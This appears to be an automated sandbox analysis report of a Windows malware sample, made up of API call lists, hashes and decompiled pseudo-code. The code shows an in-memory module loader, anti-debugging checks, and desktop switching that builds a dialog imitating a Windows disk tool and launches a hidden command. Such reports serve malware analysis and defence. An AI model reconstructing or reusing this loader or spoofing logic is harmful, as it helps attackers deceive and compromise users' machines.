                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 6F332721
                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6F33272D
                                                                                                                        • NtClose.NTDLL(?), ref: 6F332737
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Section$View$MemoryUnmap$CloseCreateMoveZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1304417992-0
                                                                                                                        • Opcode ID: 24aa4d2842e9f3f6c4d282406a3453828eb1ea6e8f1eba35bf3f88bb66c009d4
                                                                                                                        • Instruction ID: 354695f8e0d8794e2a2a7c850580af7fd883c47243ce42f0c314c4392ee4c867
                                                                                                                        • Opcode Fuzzy Hash: 24aa4d2842e9f3f6c4d282406a3453828eb1ea6e8f1eba35bf3f88bb66c009d4
                                                                                                                        • Instruction Fuzzy Hash: 6B3100B6608351BFE210DA94CDC0E6BB7ECFBC8658F404A1DF69596281D774ED048BB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00503323
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 005033A8
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                        • GetLastError.KERNEL32 ref: 0050342B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00503443
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 0050344E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$FindH_prolog3$CloseEnterErrorExceptionException@8FileFirstH_prolog3_catchInitializeLastLeaveRaiseThrow
                                                                                                                        • String ID: PCK
                                                                                                                        • API String ID: 2655951058-2846323580
                                                                                                                        • Opcode ID: 74c174a8b0647d60cfd51adf62af6949e86be48be52c03c0e2441488bf28f24e
                                                                                                                        • Instruction ID: 83f8847adb6dfe63bae665bfaaf4613524d5f19933aea8dc096e1da97c4e7999
                                                                                                                        • Opcode Fuzzy Hash: 74c174a8b0647d60cfd51adf62af6949e86be48be52c03c0e2441488bf28f24e
                                                                                                                        • Instruction Fuzzy Hash: DF41B231900244EADB21EBB0CC59FDEBBB8BF21304F14465DF152A70E1DB74AA49C755
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F3319F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                        				void* _v4;
                                                                                                                        				intOrPtr _v8;
                                                                                                                        				intOrPtr _v12;
                                                                                                                        				void* _v16;
                                                                                                                        				void* _v20;
                                                                                                                        				void* _v24;
                                                                                                                        				char _v28;
                                                                                                                        				intOrPtr _v32;
                                                                                                                        				void* _v44;
                                                                                                                        				intOrPtr _v172;
                                                                                                                        				char _v356;
                                                                                                                        				long _v360;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t69;
                                                                                                                        				intOrPtr _t70;
                                                                                                                        				intOrPtr* _t83;
                                                                                                                        				signed int _t85;
                                                                                                                        				intOrPtr _t88;
                                                                                                                        
                                                                                                                        				_t82 = _a4;
                                                                                                                        				_t69 = 0;
                                                                                                                        				if(_a4 != 0) {
                                                                                                                        					_t91 = _a8;
                                                                                                                        					_v44 = 0;
                                                                                                                        					_v24 = 0;
                                                                                                                        					_v16 = 0;
                                                                                                                        					_v20 = 0;
                                                                                                                        					_v4 = 0;
                                                                                                                        					_t88 = E6F331400( &_v356, _t82, _a8);
                                                                                                                        					if(_t88 != 0) {
                                                                                                                        						_t83 = _a16;
                                                                                                                        					} else {
                                                                                                                        						_t70 = _a12;
                                                                                                                        						_push( &_v356);
                                                                                                                        						_t88 = E6F3314E0(_t70);
                                                                                                                        						if(_t88 != 0) {
                                                                                                                        							_t83 = _a16;
                                                                                                                        						} else {
                                                                                                                        							_t88 = E6F3315C0( &_v356, _t82, _t91, _t70);
                                                                                                                        							if(_t88 != 0) {
                                                                                                                        								L18:
                                                                                                                        								_t83 = _a16;
                                                                                                                        								goto L19;
                                                                                                                        							} else {
                                                                                                                        								_t88 = E6F331660( &_v356);
                                                                                                                        								if(_t88 != 0) {
                                                                                                                        									goto L18;
                                                                                                                        								} else {
                                                                                                                        									_t88 = E6F331720( &_v356);
                                                                                                                        									if(_t88 != 0) {
                                                                                                                        										if(_v24 != 0) {
                                                                                                                        											_t85 = 0;
                                                                                                                        											if(_v20 > 0) {
                                                                                                                        												do {
                                                                                                                        													FreeLibrary( *(_v24 + _t85 * 4));
                                                                                                                        													_t85 = _t85 + 1;
                                                                                                                        												} while (_t85 < _v20);
                                                                                                                        											}
                                                                                                                        											HeapFree(GetProcessHeap(), 0, _v24);
                                                                                                                        										}
                                                                                                                        										goto L18;
                                                                                                                        									} else {
                                                                                                                        										_t88 = E6F3318D0( &_v356);
                                                                                                                        										if(_t88 != 0) {
                                                                                                                        											goto L18;
                                                                                                                        										} else {
                                                                                                                        											_t83 = _a16;
                                                                                                                        											if(_t83 != 0) {
                                                                                                                        												_v12 =  *((intOrPtr*)(_t83 + 0x2c));
                                                                                                                        												_v8 =  *((intOrPtr*)(_t83 + 0x30));
                                                                                                                        											}
                                                                                                                        											_t88 = E6F3319A0( &_v356, _t70);
                                                                                                                        											if(_t88 != 0) {
                                                                                                                        												L19:
                                                                                                                        												_push(0x8000);
                                                                                                                        												_push( &_v360);
                                                                                                                        												_push( &_v28);
                                                                                                                        												_push(0xffffffff);
                                                                                                                        												_v360 = 0;
                                                                                                                        												L6F33C2D6();
                                                                                                                        											} else {
                                                                                                                        												if(_t83 != 0) {
                                                                                                                        													 *((intOrPtr*)(_t83 + 0xc)) = _v32;
                                                                                                                        													 *((intOrPtr*)(_t83 + 0x10)) = _v28;
                                                                                                                        													 *((intOrPtr*)(_t83 + 0x14)) = _v4;
                                                                                                                        													 *((intOrPtr*)(_t83 + 4)) = 0x3c;
                                                                                                                        													 *((intOrPtr*)(_t83 + 8)) = _t70;
                                                                                                                        													 *((intOrPtr*)(_t83 + 0x18)) = _v172;
                                                                                                                        													 *(_t83 + 0x1c) = _v24;
                                                                                                                        													 *((intOrPtr*)(_t83 + 0x20)) = _v20;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t52 = _v44;
                                                                                                                        						if(_t52 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                                        						}
                                                                                                                        						_t69 = 0;
                                                                                                                        					}
                                                                                                                        					if(_t83 != _t69) {
                                                                                                                        						 *_t83 = _t88;
                                                                                                                        					}
                                                                                                                        					return _t88;
                                                                                                                        				} else {
                                                                                                                        					_t2 = _t69 - 2; // -2
                                                                                                                        					return _t2;
                                                                                                                        				}
                                                                                                                        			}
























                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F331BCF
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331BD6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 047380f890eb2922787d5ec1697360bffd52bdff47e78a173ec9d8d4179a37bf
                                                                                                                        • Instruction ID: 9fb6415a86b195740a8fd1d14fe53390594b20f304f46608c5d4b538d76cb9c6
                                                                                                                        • Opcode Fuzzy Hash: 047380f890eb2922787d5ec1697360bffd52bdff47e78a173ec9d8d4179a37bf
                                                                                                                        • Instruction Fuzzy Hash: A6513E76D087A59BC330EF54D880ADBB7E9BF88354F014A2DDC8897340E736A845CB92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B9A42
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004B9A6F
                                                                                                                        • _malloc.LIBCMT ref: 004B9AD8
                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 004B9AF0
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$AdaptersInfoInitialize$Delete_malloc
                                                                                                                        • String ID: 2dw
                                                                                                                        • API String ID: 3929486883-3142033029
                                                                                                                        • Opcode ID: 999eba96ccd612d8cec666681854cb31328405d7509e45d4a784883a39de200f
                                                                                                                        • Instruction ID: 8396a63c6efd932a34edbd92c1a521cd1ff6eb308999f150f150de0feaf15261
                                                                                                                        • Opcode Fuzzy Hash: 999eba96ccd612d8cec666681854cb31328405d7509e45d4a784883a39de200f
                                                                                                                        • Instruction Fuzzy Hash: 5971F470404288AEDF24DF68C895AEE3BB4BF15314F24451FFA0697291DB38ED84CB69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 005451ED
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00545202
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0075E8D4), ref: 0054520D
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00545229
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00545230
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2579439406-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 57%
                                                                                                                        			E6F331C00(intOrPtr _a4) {
                                                                                                                        				long _v4;
                                                                                                                        				intOrPtr* _t24;
                                                                                                                        				intOrPtr _t30;
                                                                                                                        				signed int _t37;
                                                                                                                        				intOrPtr _t39;
                                                                                                                        				void* _t40;
                                                                                                                        
                                                                                                                        				_t39 = _a4;
                                                                                                                        				_t40 = 1;
                                                                                                                        				if(_t39 == 0 ||  *((intOrPtr*)(_t39 + 4)) != 0x3c ||  *((intOrPtr*)(_t39 + 0xc)) == 0) {
                                                                                                                        					L14:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t30 = _t39 + 0x10;
                                                                                                                        					_a4 = _t30;
                                                                                                                        					if( *((intOrPtr*)(_t39 + 0x10)) == 0) {
                                                                                                                        						goto L14;
                                                                                                                        					} else {
                                                                                                                        						if( *(_t39 + 0x1c) != 0) {
                                                                                                                        							_t37 = 0;
                                                                                                                        							if( *((intOrPtr*)(_t39 + 0x20)) > 0) {
                                                                                                                        								do {
                                                                                                                        									FreeLibrary( *( *(_t39 + 0x1c) + _t37 * 4));
                                                                                                                        									_t37 = _t37 + 1;
                                                                                                                        								} while (_t37 <  *((intOrPtr*)(_t39 + 0x20)));
                                                                                                                        								_t30 = _a4;
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0,  *(_t39 + 0x1c));
                                                                                                                        						}
                                                                                                                        						if(( *(_t39 + 8) & 0x00000001) == 0) {
                                                                                                                        							_t24 =  *((intOrPtr*)(_t39 + 0x14));
                                                                                                                        							if(_t24 != 0) {
                                                                                                                        								_t40 =  *_t24( *((intOrPtr*)(_t39 + 0xc)), 0, 0);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_push(0x8000);
                                                                                                                        						_push( &_v4);
                                                                                                                        						_push(_t30);
                                                                                                                        						_push(0xffffffff);
                                                                                                                        						_v4 = 0;
                                                                                                                        						L6F33C2D6();
                                                                                                                        						return _t40;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32 ref: 6F331C57
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F331C69
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331C70
                                                                                                                        • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 6F331CA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$Heap$LibraryMemoryProcessVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020761401-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CryptReleaseContext.ADVAPI32(026A5B70,00000000), ref: 006F606B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextCryptRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 829835001-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 87%
                                                                                                                        			E6F339D10() {
                                                                                                                        				intOrPtr _v32;
                                                                                                                        				char _v264;
                                                                                                                        				char _v272;
                                                                                                                        				void* _v284;
                                                                                                                        				WCHAR* _v288;
                                                                                                                        				void* _v292;
                                                                                                                        				WCHAR* _v296;
                                                                                                                        				WCHAR* _v300;
                                                                                                                        				char _v324;
                                                                                                                        				char* _v328;
                                                                                                                        				intOrPtr _v332;
                                                                                                                        				WCHAR* _v340;
                                                                                                                        				void* _v344;
                                                                                                                        				void* _v348;
                                                                                                                        				void* _v356;
                                                                                                                        				void* _v360;
                                                                                                                        				void* _v364;
                                                                                                                        				void* _v368;
                                                                                                                        				intOrPtr _v372;
                                                                                                                        				long _v376;
                                                                                                                        				WCHAR* _v380;
                                                                                                                        				char _v384;
                                                                                                                        				void* _v388;
                                                                                                                        				void* _v392;
                                                                                                                        				void* _v396;
                                                                                                                        				char _v400;
                                                                                                                        				struct HINSTANCE__* _v404;
                                                                                                                        				void* _v408;
                                                                                                                        				short _v412;
                                                                                                                        				short _v416;
                                                                                                                        				char _v420;
                                                                                                                        				struct HDESK__* _t62;
                                                                                                                        				struct HDESK__* _t66;
                                                                                                                        				CHAR* _t72;
                                                                                                                        				WCHAR* _t114;
                                                                                                                        				void* _t118;
                                                                                                                        				WCHAR* _t119;
                                                                                                                        				WCHAR* _t120;
                                                                                                                        				struct HDESK__* _t121;
                                                                                                                        				struct HDESK__* _t122;
                                                                                                                        				char _t130;
                                                                                                                        				struct HINSTANCE__* _t136;
                                                                                                                        				void* _t139;
                                                                                                                        				void* _t141;
                                                                                                                        				struct HINSTANCE__* _t142;
                                                                                                                        				WCHAR* _t143;
                                                                                                                        				WCHAR* _t144;
                                                                                                                        				WCHAR* _t145;
                                                                                                                        				WCHAR* _t146;
                                                                                                                        				WCHAR* _t147;
                                                                                                                        				WCHAR* _t148;
                                                                                                                        				WCHAR* _t151;
                                                                                                                        				short* _t153;
                                                                                                                        				short* _t154;
                                                                                                                        				short* _t155;
                                                                                                                        
                                                                                                                        				_t62 =  *0x6f340480; // 0x0
                                                                                                                        				SwitchDesktop(_t62);
                                                                                                                        				_t121 =  *0x6f340480; // 0x0
                                                                                                                        				SetThreadDesktop(_t121);
                                                                                                                        				__imp__CoInitializeEx(0, 6);
                                                                                                                        				_t142 = LoadLibraryA("comctl32.dll");
                                                                                                                        				_v404 = _t142;
                                                                                                                        				if(_t142 != 0) {
                                                                                                                        					_push(0xff000000);
                                                                                                                        					_push(1);
                                                                                                                        					_push( &_v400);
                                                                                                                        					_push(_t142);
                                                                                                                        					_v400 = 0xc590294f;
                                                                                                                        					_v396 = 0;
                                                                                                                        					_v392 = 0;
                                                                                                                        					_v388 = 0;
                                                                                                                        					E6F331DB0();
                                                                                                                        					_t153 =  &(( &_v412)[8]);
                                                                                                                        					if(_v388 != 0) {
                                                                                                                        						_t72 = GetCommandLineA();
                                                                                                                        						_v420 = 0;
                                                                                                                        						_t139 = E6F33A3D0(_t72,  &_v420);
                                                                                                                        						_t154 =  &(_t153[4]);
                                                                                                                        						_v416 = _t139;
                                                                                                                        						if(_t139 != 0) {
                                                                                                                        							if(_v420 > 3) {
                                                                                                                        								_t130 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        								wsprintfA( &_v272, "%s%s", _t130, "DFDWiz.exe");
                                                                                                                        								_t155 =  &(_t154[8]);
                                                                                                                        								_t136 = LoadLibraryExA( &_v264, 0, 0x20);
                                                                                                                        								if(_t136 != 0) {
                                                                                                                        									_t141 = HeapAlloc(GetProcessHeap(), 8, 0x1770);
                                                                                                                        									if(_t141 != 0) {
                                                                                                                        										_t23 = _t141 + 0x190; // 0x190
                                                                                                                        										_t143 = _t23;
                                                                                                                        										if(LoadStringW(_t136, 0x79, _t143, 0xc8) > 0) {
                                                                                                                        											_v340 = _t143;
                                                                                                                        										}
                                                                                                                        										_t25 = _t141 + 0x320; // 0x320
                                                                                                                        										_t144 = _t25;
                                                                                                                        										if(LoadStringW(_t136, 0x7c, _t144, 0x3e8) > 0) {
                                                                                                                        											_t114 = StrChrW(_t144, 0xa);
                                                                                                                        											if(_t114 != 0) {
                                                                                                                        												_v340 =  &(_t114[1]);
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										_t27 = _t141 + 0xaf0; // 0xaf0
                                                                                                                        										_t145 = _t27;
                                                                                                                        										if(FormatMessageW(0xaff, _t136, 0x50000001, 0, _t145, 0x64, 0) != 0) {
                                                                                                                        											_v288 = _t145;
                                                                                                                        										}
                                                                                                                        										_t29 = _t141 + 0xbb8; // 0xbb8
                                                                                                                        										_t146 = _t29;
                                                                                                                        										if(LoadStringW(_t136, 0x1b0, _t146, 0x64) > 0) {
                                                                                                                        											_t30 = _t141 + 0xc80; // 0xc80
                                                                                                                        											if(LoadStringW(_t136, 0xf6, _t30, 0x64) > 0) {
                                                                                                                        												_t31 = _t141 + 0xc80; // 0xc80
                                                                                                                        												_v372 = _t31;
                                                                                                                        												_v384 = 1;
                                                                                                                        												_v380 = _t146;
                                                                                                                        												_v376 = 8;
                                                                                                                        												_v332 = 2;
                                                                                                                        												_v324 = 1;
                                                                                                                        												_v328 =  &_v384;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										_t40 = _t141 + 0xd48; // 0xd48
                                                                                                                        										_t147 = _t40;
                                                                                                                        										if(LoadStringW(_t136, 0x7e, _t147, 0x64) > 0) {
                                                                                                                        											_v296 = _t147;
                                                                                                                        										}
                                                                                                                        										_t42 = _t141 + 0xe10; // 0xe10
                                                                                                                        										_t148 = _t42;
                                                                                                                        										if(LoadStringW(_t136, 0x7f, _t148, 0x64) > 0) {
                                                                                                                        											_v300 = _t148;
                                                                                                                        										}
                                                                                                                        										_t44 = _t141 + 0xed8; // 0xed8
                                                                                                                        										if(LoadStringW(_t136, 0x81, _t44, 0xc8) > 0) {
                                                                                                                        											PathBuildRootW( &_v412, PathGetDriveNumberA( &_v272));
                                                                                                                        											_t47 = _t141 + 0x1068; // 0x1068
                                                                                                                        											_t120 = _t47;
                                                                                                                        											GetVolumeInformationW( &_v416, _t120, 0x64, 0, 0, 0, 0, 0);
                                                                                                                        											_v412 = 0;
                                                                                                                        											_t50 = _t141 + 0x1130; // 0x1130
                                                                                                                        											_t151 = _t50;
                                                                                                                        											if( *_t120 == 0) {
                                                                                                                        												_t120 = L"<n/a>";
                                                                                                                        											}
                                                                                                                        											_t52 = _t141 + 0xed8; // 0xed8
                                                                                                                        											wsprintfW(_t151, _t52,  &_v416, _t120);
                                                                                                                        											_t155 =  &(_t155[8]);
                                                                                                                        											_v300 = _t151;
                                                                                                                        										}
                                                                                                                        										_t118 = HeapAlloc(GetProcessHeap(), 0, 0x105);
                                                                                                                        										if(_t118 != 0) {
                                                                                                                        											wsprintfA(_t118, "/c start /b \"\" \"%s\" f w %d",  *((intOrPtr*)(_v416 + 0xc)), 5);
                                                                                                                        											E6F339C50(0, 0x83f2, _t118);
                                                                                                                        											_v400( &_v380, 0, 0, 0, 0, 0);
                                                                                                                        											HeapFree(GetProcessHeap(), 0, _t118);
                                                                                                                        											if(_v32 != 0) {
                                                                                                                        												Sleep(0x1f4);
                                                                                                                        												E6F3396D0(0);
                                                                                                                        											}
                                                                                                                        											Sleep(0x1f4);
                                                                                                                        										}
                                                                                                                        										if(FormatMessageW(0xaff, _t136, 0xb0000002, 0, _t141, 0x1f4, 0) != 0) {
                                                                                                                        											_t59 = _t141 + 0x3e8; // 0x3e8
                                                                                                                        											_t119 = _t59;
                                                                                                                        											if(FormatMessageW(0xaff, _t136, 0x50000004, 0, _t119, 0x64, 0) != 0) {
                                                                                                                        												MessageBoxW(0, _t141, _t119, 0x40);
                                                                                                                        												Sleep(0x1f4);
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										HeapFree(GetProcessHeap(), 0, _t141);
                                                                                                                        										_t142 = _v404;
                                                                                                                        									}
                                                                                                                        									FreeLibrary(_t136);
                                                                                                                        									_t139 = _v408;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							LocalFree(_t139);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					FreeLibrary(_t142);
                                                                                                                        				}
                                                                                                                        				__imp__CoUninitialize();
                                                                                                                        				_t66 =  *0x6f340484; // 0x0
                                                                                                                        				SwitchDesktop(_t66);
                                                                                                                        				_t122 =  *0x6f340484; // 0x0
                                                                                                                        				SetThreadDesktop(_t122);
                                                                                                                        				return 0;
                                                                                                                        			}
                                                                                                                        0x6f33a0b5
                                                                                                                        0x6f33a0bd
                                                                                                                        0x6f33a0c8
                                                                                                                        0x6f33a0c8
                                                                                                                        0x6f33a0b5
                                                                                                                        0x6f33a0d8
                                                                                                                        0x6f33a0de
                                                                                                                        0x6f33a0de
                                                                                                                        0x6f33a0e3
                                                                                                                        0x6f33a0e9
                                                                                                                        0x6f33a0e9
                                                                                                                        0x6f33a0ed
                                                                                                                        0x6f33a0ef
                                                                                                                        0x6f33a0ef
                                                                                                                        0x6f33a0f5
                                                                                                                        0x6f33a0f7
                                                                                                                        0x6f33a0f7
                                                                                                                        0x6f33a0fd
                                                                                                                        0x6f33a103
                                                                                                                        0x6f33a109
                                                                                                                        0x6f33a10f
                                                                                                                        0x6f33a116
                                                                                                                        0x6f33a126

                                                                                                                        APIs
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F339D1E
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339D2B
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 6F339D36
                                                                                                                        • LoadLibraryA.KERNEL32(comctl32.dll), ref: 6F339D41
                                                                                                                        • GetCommandLineA.KERNEL32(?,00000001,FF000000), ref: 6F339D89
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • wsprintfA.USER32 ref: 6F339DD4
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000020,?,?,?,?,?,?,00000001,FF000000), ref: 6F339DE8
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001770,?,?,?,?,?,?,00000001,FF000000), ref: 6F339DFF
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F339E06
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000060), ref: 6F339E1D
                                                                                                                        • LoadStringW.USER32 ref: 6F339E67
                                                                                                                        • LoadStringW.USER32(00000000,00000079,00000190,000000C8), ref: 6F339E80
                                                                                                                        • LoadStringW.USER32(00000000,0000007C,00000320,000003E8), ref: 6F339E99
                                                                                                                        • StrChrW.SHLWAPI(00000320,0000000A), ref: 6F339EA2
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000001,00000000,00000AF0,00000064,00000000), ref: 6F339ECB
                                                                                                                        • LoadStringW.USER32(00000000,000001B0,00000BB8,00000064), ref: 6F339EEB
                                                                                                                        • LoadStringW.USER32(00000000,000000F6,00000C80,00000064), ref: 6F339F00
                                                                                                                        • LoadStringW.USER32(00000000,0000007E,00000D48,00000064), ref: 6F339F45
                                                                                                                        • LoadStringW.USER32(00000000,0000007F,00000E10,00000064), ref: 6F339F5E
                                                                                                                        • LoadStringW.USER32(00000000,00000081,00000ED8,000000C8), ref: 6F339F7D
                                                                                                                        • PathGetDriveNumberA.SHLWAPI(?), ref: 6F339F8B
                                                                                                                        • PathBuildRootW.SHLWAPI(?,00000000), ref: 6F339F97
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,00001068,00000064,00000000,00000000,00000000,00000000,00000000), ref: 6F339FB5
                                                                                                                        • wsprintfW.USER32 ref: 6F339FE0
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000105), ref: 6F339FFD
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33A000
                                                                                                                        • wsprintfA.USER32 ref: 6F33A01C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A048
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A04B
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A060
